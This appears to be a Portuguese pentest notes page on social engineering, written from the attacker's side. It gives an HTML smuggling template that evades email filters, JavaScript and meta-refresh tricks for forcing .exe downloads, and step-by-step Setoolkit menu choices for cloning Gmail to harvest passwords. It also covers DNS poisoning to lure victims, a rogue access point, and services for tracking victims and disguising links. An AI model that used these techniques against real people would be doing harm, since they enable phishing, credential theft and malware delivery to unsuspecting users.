Engenharia Social
Engenharia social é termo utilizado para descrever um método de ataque, onde alguém faz uso da persuasão, muitas vezes abusando da ingenuidade ou confiança do usuário, para obter informações que podem ser utilizadas para ter acesso não autorizado a computadores ou informações.
Download Automático
Maneira 1 - Smuggling HTML
Monta o código HTML para baixar o arquivo em tempo real no navegador do usuário, então isso faz um bypass nos mecanismos de segurança dos e-mails
<html>
<head>
<title>HTML Smuggling</title>
</head>
<body>
<p>This is all the user will see...</p>
<script>
function convertFromBase64(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array( len );
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
var data = convertFromBase64(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'test.txt';
if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
else {
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
</script>
</body>
</html>Maneira 2
Um ótimo jeito quando se tem acesso ao código, é fazer o usuário baixar algo automaticamente e, para isso pode utilizar um dos seguintes métodos:
<script> document.location.href = '<file.exe>'; </script>
# Ou
<html>
<head>
<meta http-equiv="refresh" content="0; url=<file.exe>">
</head>
</html>Obviamente, o usuário precisará aceitar o download do arquivo, mas muitas pessoas deixam marcado a caixa de download automático
Setoolkit
Clonar Sites Para Capturar Senhas
Abra o terminal e digite setoolkit e vá na opção 5, depois 6 (SET Configuration)
ROUBANDO SENHAS DO GMAIL
setoolkit
1 # Social-Engineering Attacks
2 # Website Attack Vectors
3 # Credential Harvester Attack Method
1 # Web Templates
# Coloque o IP do Kali Linux
2 # Google ou GmailDepois disso basta fazer com que a vítima acesse seu IP no navegador, e irá abrir á página do Google pedindo usuário e senha. Assim que a vítima digitar o usuário e senha, irá ser gravado um LOG com as informações em: /var/www/html/harvester_date.txt
OBS.: Até então está tudo ok, porém nenhuma vítima vai querer colocar o IP do Kali no navegador para acessar o Google. Então utilize o Ettercap para realizar o envenenamento de DNS (Vide na sessão de MITM).
Usando Kali Linux como Access Point
Antes de começar vá no terminal e execute o seguinte comando para depois configurar o Hostspot: nmtui Ou se preferir, pode alterar tudo manualmente, alterando o arquivo: /etc/NetworkManager/system-connections/Hotspot
setoolkit
1 # Social-Engeneering Attacks
7 # Wireless Access Point Attack Vector
1 # Start the SET...
ENTER
CTRL-X
2
<interface_rede>Agora vá nas configurações de rede, do lado esquerdo em "Wi-fi (wlan0), e clique em Use as Hotspot e depois em Turn on
OBS.: Para voltar a placa de rede ao normal, ainda no Setoolkit utilize a opção 2 (Stop the SET...), nas configurações de rede, desabilite o Hotspot e depois desabilite a placa de rede e ative novamente
Sites
# Ferramenta para pegar informações das vítimas via e-mail, sendo o alvo só precisa abrir um e-mail.
Para isso, basta cadastrar o e-mail da vítima no Mail Tracking, e enviar um email para a vitima no formato `email_vitima@email.mailtracking.com`
http://www.mailtracking.com
# Esconde a URL original, semelhante ao `adfly` ou `goo.gl`, porém esse tem sempre a mesma URL encodada, pois utiliza caracteres invisível
https://zws.im/
# Esconde a URL original, semelhante ao `adfly` ou `goo.gl`, porém esse, fornece os dados da pessoa que clicou na URL, como IP, hostname, user-agent e refering url
http://blasze.com
http://unshorten.it
**OBS.:** Depois de fizer isso no Blasze, utilize o goo.gl para deixar a URL do Blasze mais "amigável"
# Enviar SMS de graça
http://www.afreesms.com/Last updated
Was this helpful?